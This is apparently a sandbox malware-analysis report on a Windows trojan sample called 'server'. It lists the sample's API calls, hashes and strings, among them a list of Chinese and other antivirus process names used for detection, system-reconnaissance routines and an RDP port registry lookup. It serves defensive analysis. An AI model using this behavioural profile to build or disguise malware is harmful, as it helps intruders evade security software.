Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
String ID:
API String ID: 92035984-0
Opcode ID: a791306defce20405aa908a4db8f274af4d7f10402202b8947f2bc827508db97
Instruction ID: 23e376a9647dfb6a5603cf557fd056fd51601b5aa0499376741d0f3cabce9402
Opcode Fuzzy Hash: a791306defce20405aa908a4db8f274af4d7f10402202b8947f2bc827508db97
Instruction Fuzzy Hash: 0501DA74608351AFD300DF18CC95F2BBBE5BB88714F544A0CF598A7390D674DA048B92

Function 100027C0 Relevance: 6.0, APIs: 4, Instructions: 17threadwindowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 100027C3
GetCurrentThreadId.KERNEL32 ref: 100027CF
PostThreadMessageA.USER32(00000000), ref: 100027D6
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100027E7

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: MessageThread$CurrentInputPostState
String ID:
API String ID: 2517755969-0
Opcode ID: 467fd943cdf485c2228c8ab07c2f3d1e6c889fb3db9b5598c51c2eda3ead2745
Instruction ID: ec20eca8a2726810b7ac3bdd9eb78ebb057f1ba0a7407110d6dd7586cdd0874f
Opcode Fuzzy Hash: 467fd943cdf485c2228c8ab07c2f3d1e6c889fb3db9b5598c51c2eda3ead2745
Instruction Fuzzy Hash: 47D09E76680360B7F7106BA48C4EF4A3A29AB14B02F904414F705DA2E1E6F456548B66

Function 100FA599 Relevance: 4.7, APIs: 3, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000), ref: 100FA617
VirtualProtect.KERNEL32(?,?,-0000002C,-00000524,?,-0000002C,00000000,-00000524), ref: 100FA786

Memory Dump Source

Source File: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Virtual$FreeProtect
String ID:
API String ID: 2581862158-0
Opcode ID: 0d4901908797a334fb655ef77a27580c9664ec9e80afb356d6c38425ab25cfc6
Instruction ID: 6f2f89bf7d1db90bc62700e0d4ef9e05fe8b12a546338cedc59c46f9f7a7bead
Opcode Fuzzy Hash: 0d4901908797a334fb655ef77a27580c9664ec9e80afb356d6c38425ab25cfc6
Instruction Fuzzy Hash: 356108B6A042199FDB21CA14CC80BA9B7F1EF86350F2944A8D585DB380D771ACC2EB50

Function 10003FB0 Relevance: 4.6, APIs: 3, Instructions: 63networksleepCOMMON

Download Yara Rule

APIs

send.WS2_32(?,00000005,?,00000000), ref: 10003FE1
Sleep.KERNEL32(0000000A), ref: 1000400E
send.WS2_32(?,00000005,00000000,00000000), ref: 1000402B

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: send$Sleep
String ID:
API String ID: 3329562092-0
Opcode ID: 96077dc66876e708ef1fcc9b6368c56c91208f17216d08347fa5526f0ee46f43
Instruction ID: 77b5075c0e0706e6fe537e8dad593779b6e714eb1a19249b102693e1965d96d3
Opcode Fuzzy Hash: 96077dc66876e708ef1fcc9b6368c56c91208f17216d08347fa5526f0ee46f43
Instruction Fuzzy Hash: 28110072A053129BE310CE558C84B0BB7E9EB84B91F01042DF259A7281CAB0DC498B92

Function 00401220 Relevance: 3.1, APIs: 2, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,00000000,00025AE0,00000000,00000000,?,00401104,00000000,?,00000000,0040171B,?), ref: 0040126F
VirtualProtect.KERNEL32(?,?,?,00000000,00000000,00025AE0,00000000,00000000,?,00401104,00000000,?,00000000,0040171B,?), ref: 004012B9

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: Virtual$FreeProtect
String ID:
API String ID: 2581862158-0
Opcode ID: f801a129de5809b732e664a6cc53c47325ccf0b078c9723bd4da4c6216af6513
Instruction ID: cfbe6bb36115d2e176d5e1e333ca34e8b356980680857497402e3289145d6506
Opcode Fuzzy Hash: f801a129de5809b732e664a6cc53c47325ccf0b078c9723bd4da4c6216af6513
Instruction Fuzzy Hash: E421D871A002028BD718DF44D994E7BB3AAFB84704B4542ADE902FB3A5D734FC51C7A4

Function 10003A70 Relevance: 3.1, APIs: 2, Instructions: 68networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003ACE
recv.WS2_32(?,?,00002000,00000000), ref: 10003B02

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: 19576c416ae504b1cccc257a0332ddcb8846f1a110b95e4235e961779e10f328
Instruction ID: 77f38b4f01034acc4ef75d27983cb47ae4e02c498766849425d2027918183be4
Opcode Fuzzy Hash: 19576c416ae504b1cccc257a0332ddcb8846f1a110b95e4235e961779e10f328
Instruction Fuzzy Hash: D11103323443446BE710CA68DC95BDB73D9EF853A4F004A39BB598B1D2DB74A90983A2

Function 100FA53B Relevance: 3.0, APIs: 2, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,100FA084,EntryPoint), ref: 100FA580
ExitProcess.KERNEL32(00000000), ref: 100FA8FB

Memory Dump Source

Source File: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: AllocExitProcessVirtual
String ID:
API String ID: 3766876677-0
Opcode ID: 29cb7059c9fc364e7bf2e3c86ffc917cdf4fabc8ff533185fd67f21a229e1547
Instruction ID: 4fe5e7ace49094330533e09a95d20d8f760df63a6f60646aa6e15ecdf47a5985
Opcode Fuzzy Hash: 29cb7059c9fc364e7bf2e3c86ffc917cdf4fabc8ff533185fd67f21a229e1547
Instruction Fuzzy Hash: E6F068B4A403199FDB628F15CD04BDA76F4EF46751F1040E5E20AAA1C1C6749DC5CF24

Function 00402F1C Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,00401A98,00000000), ref: 00402F2D

Part of subcall function 00402DD4: GetVersionExA.KERNEL32 ref: 00402DF3

HeapDestroy.KERNEL32 ref: 00402F6C

Part of subcall function 00401B78: HeapAlloc.KERNEL32(00000000,00000140,00402F55,000003F8), ref: 00401B85

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 1ae676ff0c69a4e6bd76d125cd19fc1d98bddf8f6eca4611174da9189c4adda8
Instruction ID: 7f902ff39227f710822e6fdadf78228f4e262f85bb6e0f50fc68827d9ffdcbf0
Opcode Fuzzy Hash: 1ae676ff0c69a4e6bd76d125cd19fc1d98bddf8f6eca4611174da9189c4adda8
Instruction Fuzzy Hash: 98F03030684302A9DB206B315E0DB2636B49B14786F90443BF901E91E0EAF88586A619

Function 005C05AA Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 005C0626
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005C0659

Memory Dump Source

Source File: 00000003.00000003.1324589986.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_5c0000_server.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
Instruction ID: 14ce0655c9299a34a8be3daa5d5955485809aa52f0de16a3d79ce67e5b0e62d2
Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
Instruction Fuzzy Hash: 0121D435A00219BFDB008FA4CC40FEEFFB5FB54394F608166E960A22C0E7704A519B54

Function 00401150 Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,00000000,00025AE0,00000000,00000000,00407050,004010DB,00407050,00025AE0,00000000,?,00000000), ref: 0040119C
VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,00025AE0,00000000,00000000,00407050,004010DB,00407050,00025AE0,00000000,?,00000000), ref: 004011CB

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a2a3c457274da8820965d6bbbe8d61300a5dc59c40c1fe27a0868a67a8417ca4
Instruction ID: 1c7d8852802480053448be35edf0ca85dfca700aa98abf57b225bd8b4d40fa7f
Opcode Fuzzy Hash: a2a3c457274da8820965d6bbbe8d61300a5dc59c40c1fe27a0868a67a8417ca4
Instruction Fuzzy Hash: 15219571A442018FCB18CF14D894B2BBBE2FB88354F1585ADEA46DB390CB74DC85CBA0

Function 100012A0 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

6CC61E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1222aa73b46b66728d6cd3aadffbea8403bbc66a217cf400f6dc0928efd9cc83
Instruction ID: 8c5e13ae8a6d2d630b5cdf0ea91dc5de868f8d74ac694966006bdb18839bb920
Opcode Fuzzy Hash: 1222aa73b46b66728d6cd3aadffbea8403bbc66a217cf400f6dc0928efd9cc83
Instruction Fuzzy Hash: 29D02B3190022026F650D520AD02FDF73DC9F53B80F814138BE40D6082E9184B2E43E2

Function 10015E40 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 10015E4A

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: calloc
String ID:
API String ID: 2635317215-0
Opcode ID: 8e9727687917e279abf897c07722a1903250bb2e9caaf9f2d8482a537b497e5c
Instruction ID: 6dbe3aecfb57257a18ed92bf778f98b40f4d5830df8d968e854abdc2cc444f5c
Opcode Fuzzy Hash: 8e9727687917e279abf897c07722a1903250bb2e9caaf9f2d8482a537b497e5c
Instruction Fuzzy Hash: D3B012FD5042007FC908D794DC42CABB39DEFC4200F80880CBC4842201D935E804C632

Non-executed Functions

Function 1000AA30 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 444registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 1000A950: GetVersionExA.KERNEL32 ref: 1000A964
Part of subcall function 1000A950: wsprintfA.USER32 ref: 1000A97D

wsprintfA.USER32 ref: 1000AA75
RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00000001,?), ref: 1000AA8E
RegQueryValueExA.ADVAPI32 ref: 1000AAB2
RegCloseKey.ADVAPI32(00000000), ref: 1000AABD
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000000), ref: 1000AB02
RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,?,?,?), ref: 1000AB31
RegCloseKey.ADVAPI32(00000000), ref: 1000AB3C
wsprintfA.USER32 ref: 1000AB57
GetTickCount.KERNEL32 ref: 1000AB5C
wsprintfA.USER32 ref: 1000ABAC
GetComputerNameA.KERNEL32(?,?), ref: 1000ABC6
GetUserNameA.ADVAPI32(?,00000080), ref: 1000ABD9
wsprintfA.USER32 ref: 1000ABF4
GetLogicalDriveStringsA.KERNEL32(00000100,?), ref: 1000AC21
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000AC7E
SHGetFileInfo.SHELL32(?,00000080,?,00000160,00000410), ref: 1000AC9C
lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACAA
lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACB4
GetDiskFreeSpaceExA.KERNEL32(?,?,?,00000000,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACCD
lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000AD0A
wsprintfA.USER32 ref: 1000AD2B
wsprintfA.USER32 ref: 1000AD3F
GlobalMemoryStatusEx.KERNEL32 ref: 1000AD90
wsprintfA.USER32 ref: 1000ADB9
GlobalMemoryStatusEx.KERNEL32 ref: 1000ADD8
wsprintfA.USER32 ref: 1000AE01
wsprintfA.USER32 ref: 1000AE79
lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 1000AE88
wsprintfA.USER32 ref: 1000AEBE
_strrev.MSVCRT ref: 1000AF02
_strrev.MSVCRT ref: 1000AF1A
_strrev.MSVCRT ref: 1000AF58
wsprintfA.USER32 ref: 1000AFEC
wsprintfA.USER32 ref: 1000AFFE

Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658

Strings

exe.pva, xrefs: 1000AF15
ESET , xrefs: 1000AF88
KvMonXP.exe, xrefs: 1000AF38
QQPCTray.exe, xrefs: 1000AFB2
PortNumber, xrefs: 1000AE9E
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 1000AA84
360tray.exe, xrefs: 1000AEE0
@, xrefs: 1000ADD0
egui.exe, xrefs: 1000AF73
kxetray.exe, xrefs: 1000AF90
exe.ds063, xrefs: 1000AEFD
~MHz, xrefs: 1000AAA4
exe.DnoMvaR, xrefs: 1000AF53
KSafeTray.exe, xrefs: 1000AFA1
ProcessorNameString, xrefs: 1000AB23
SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp, xrefs: 1000AE38
@, xrefs: 1000AD85
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 1000AAC8

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: wsprintf$lstrlen$_strrev$CloseGlobalMemoryNameOpenQueryStatusValue$??2@ComputerCountCreateDiskDriveFileFirstFreeInfoInformationLogicalProcess32SnapshotSpaceStringsTickToolhelp32UserVersionVolume_strcmpi
String ID: 360tray.exe$@$@$ESET $HARDWARE\DESCRIPTION\System\CentralProcessor\0$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KSafeTray.exe$KvMonXP.exe$PortNumber$ProcessorNameString$QQPCTray.exe$SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp$egui.exe$exe.DnoMvaR$exe.ds063$exe.pva$kxetray.exe$~MHz
API String ID: 1471316505-3197601762
Opcode ID: 0a2200de033f60b7763fec6134aa8c7effb7a67c4c5f73fab1d444603738a109
Instruction ID: f75789e8d26e0488ce98ecbec9e6a297644c4fc480bb15a39e026aad78d3882d
Opcode Fuzzy Hash: 0a2200de033f60b7763fec6134aa8c7effb7a67c4c5f73fab1d444603738a109
Instruction Fuzzy Hash: A0E1D7B1504385AFE720CB64CC45FEBB7DAEFC4340F40892DF68597251EB74AA098B66

Function 10010760 Relevance: 79.2, APIs: 42, Strings: 3, Instructions: 406stringmemoryserviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10010811
OutputDebugStringA.KERNEL32(OpenSCManager Error), ref: 10010826
LocalAlloc.KERNEL32(00000040,00010000), ref: 10010839
EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,00010000,?,?,?), ref: 10010857
LocalAlloc.KERNEL32(00000040,00000104), ref: 10010864
OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 100108AF
LocalAlloc.KERNEL32(00000040,00001000), ref: 100108C2
QueryServiceConfigA.ADVAPI32(00000000,00000000,00001000,?), ref: 100108D6
lstrcat.KERNEL32(00000000,1007B8FC), ref: 1001091B
lstrcat.KERNEL32(?,1007B8F4), ref: 1001093E
lstrcat.KERNEL32(?,1007B8EC), ref: 10010961
lstrcat.KERNEL32(?,1007B8E4), ref: 10010984
wsprintfA.USER32 ref: 100109A1
wsprintfA.USER32 ref: 100109CF

Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538

Part of subcall function 1000E630: RegQueryValueExA.ADVAPI32(?,100109FB,00000000,100109FB,?), ref: 1000E653

wsprintfA.USER32 ref: 10010A10
lstrlen.KERNEL32(?), ref: 10010A19
lstrlen.KERNEL32(?), ref: 10010A25
lstrlen.KERNEL32(?), ref: 10010A31
lstrlen.KERNEL32(?), ref: 10010A3A
lstrlen.KERNEL32(?), ref: 10010A46
lstrlen.KERNEL32 ref: 10010A4D
lstrlen.KERNEL32(?), ref: 10010A55
LocalSize.KERNEL32(?), ref: 10010A67
LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 10010A75
lstrlen.KERNEL32(?), ref: 10010A83
lstrlen.KERNEL32(?), ref: 10010AA8
lstrlen.KERNEL32(00000000), ref: 10010AB9
lstrlen.KERNEL32(00000001), ref: 10010AD7
lstrlen.KERNEL32(?), ref: 10010AED
lstrlen.KERNEL32(?), ref: 10010B0E
lstrlen.KERNEL32(?), ref: 10010B24
lstrlen.KERNEL32(?), ref: 10010B4C
lstrlen.KERNEL32(?), ref: 10010B5F
lstrlen.KERNEL32(?), ref: 10010B81
lstrlen.KERNEL32(?), ref: 10010B97
lstrlen.KERNEL32(?), ref: 10010BBF
lstrlen.KERNEL32(?), ref: 10010BD5
lstrlen.KERNEL32(?), ref: 10010BFD
CloseServiceHandle.ADVAPI32(?), ref: 10010C10
LocalFree.KERNEL32(?), ref: 10010C1B

Part of subcall function 1000E4C0: RegCloseKey.ADVAPI32(?,?,10010C35), ref: 1000E56B

CloseServiceHandle.ADVAPI32(00000000), ref: 10010C56
LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 10010C64

Strings

OpenSCManager Error, xrefs: 10010821
Description, xrefs: 100109F1
SYSTEM\CurrentControlSet\Services\%s, xrefs: 100109BE

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: lstrlen$Local$Alloc$Servicelstrcat$CloseOpenwsprintf$HandleQuery$ConfigDebugEnumFreeManagerOutputServicesSizeStatusStringValue
String ID: Description$OpenSCManager Error$SYSTEM\CurrentControlSet\Services\%s
API String ID: 1351573288-819907790
Opcode ID: 1a881d35233bf88a2e802367d92db6c209cf20d2a01c2cbbb9a98567baa261a7
Instruction ID: b787a0c5a13c364073f78a8c29dfe8d65fa9e81c690259f46e75a22daf9f128f
Opcode Fuzzy Hash: 1a881d35233bf88a2e802367d92db6c209cf20d2a01c2cbbb9a98567baa261a7
Instruction Fuzzy Hash: 94E18D722083859FD724CF24CC84AABB7E6FBC8700F44491DF68A97240DB75E949CB96

Function 1000B0F0 Relevance: 42.1, APIs: 4, Strings: 20, Instructions: 103shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 1000B030: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B04E
Part of subcall function 1000B030: lstrlen.KERNEL32(?), ref: 1000B05E
Part of subcall function 1000B030: RegSetValueExA.ADVAPI32(?,?,00000000,00000002,?,00000000), ref: 1000B074
Part of subcall function 1000B030: RegCloseKey.ADVAPI32(?), ref: 1000B084

Part of subcall function 1000B090: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B0AE
Part of subcall function 1000B090: RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 1000B0CD
Part of subcall function 1000B090: RegCloseKey.ADVAPI32(?), ref: 1000B0DC

_strrev.MSVCRT ref: 1000B150
_strrev.MSVCRT ref: 1000B16F
GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,PortNumber), ref: 1000B24A

Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97

ExitWindowsEx.USER32(00000002,00000000), ref: 1000B276

